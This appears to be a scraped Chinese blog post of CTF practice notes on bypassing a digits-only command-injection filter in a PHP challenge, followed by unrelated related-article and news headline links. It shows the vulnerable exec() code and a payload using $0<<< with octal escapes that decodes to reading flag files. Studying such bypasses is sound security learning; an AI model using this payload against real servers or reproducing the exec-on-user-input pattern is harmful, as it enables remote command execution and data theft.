当前位置: 首页 > news >正文

RCE联系

过滤
绕过空格
● 进制绕过

题目练习
数字rce
使用$0执行bash,<<<将后面的字符串传递给左边的命令。
例如:

<?php highlight_file(__FILE__); function waf($cmd) { $whiteList = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '\\', '\'', '$', '<']; $cmd_char = str_split($cmd); foreach ($cmd_char as $char) { if (!in_array($char, $whiteList)) { die("hacker"); } } return $cmd; } $cmd = $_GET['cmd']; exec(waf($cmd)); cmd=$0<<<$'\143\141\164\040\57\146\52\040\76\040\61\56\164\170\164' $0代表当前脚本名称,如何在bash里运行代表/bin/bash <<<是bash中的Here String重定向符,会将后面的字符串作为标准输入传递给左边的命令 后面那段是八进制绕过,相当于$'cat /f* > 1.txt'

相关文章:

  • qtcreator导入帮助文档
  • 网页jupyter如何显示jpipvenv虚拟环境
  • 2.Redis-List列表类型详解(HM)
  • 2025年阿里云大数据ACP高级工程师认证模拟试题(附答案解析)
  • 【大数据】MapReduce 编程--WordCount
  • 构造二叉树
  • [学习]RTKLib详解:ionex.c、options.c与preceph.c
  • Android NDK开发入门:理解JNI的本质与数据类型处理
  • AI大模型学习二十、利用Dify+deepseekR1 使用知识库搭建初中英语学习智能客服机器人
  • 防火墙来回路径不一致导致的业务异常
  • 在Ubuntu系统下编译OpenCV 4.8源码
  • Linux驱动:驱动编译流程了解
  • AI日报 · 2025年5月12日|OpenAI 更新「Supervised Fine‑Tuning」文档与 API 示范
  • Ubuntu源码版comfyui的安装
  • 二、HAL库的命名规则详解
  • Edge浏览器打开PDF文件显示空白(每次需要等上一会)
  • Docker-配置私有仓库(Harbor)
  • Kubernetes控制平面组件:Kubelet详解(一):API接口层介绍
  • 【CF】Day57——Codeforces Round 955 (Div. 2, with prizes from NEAR!) BCD
  • 图形化编程如何从工具迭代到生态重构?
  • 专访|西蒙·斯特朗格:以“辞典”的方式讲述二战家族史
  • 三大股份制银行入局AIC,一级市场再迎“活水”
  • 佩斯科夫:俄会考虑30天停火提议,但试图对俄施压无用
  • 印巴战火LIVE丨“快速接近战争状态”?印度袭击巴军事基地,巴启动反制军事行动
  • 深圳市政协原副主席王幼鹏被“双开”
  • 国家发改委:美芯片药品等领域关税影响全球科技发展,损害人类共同利益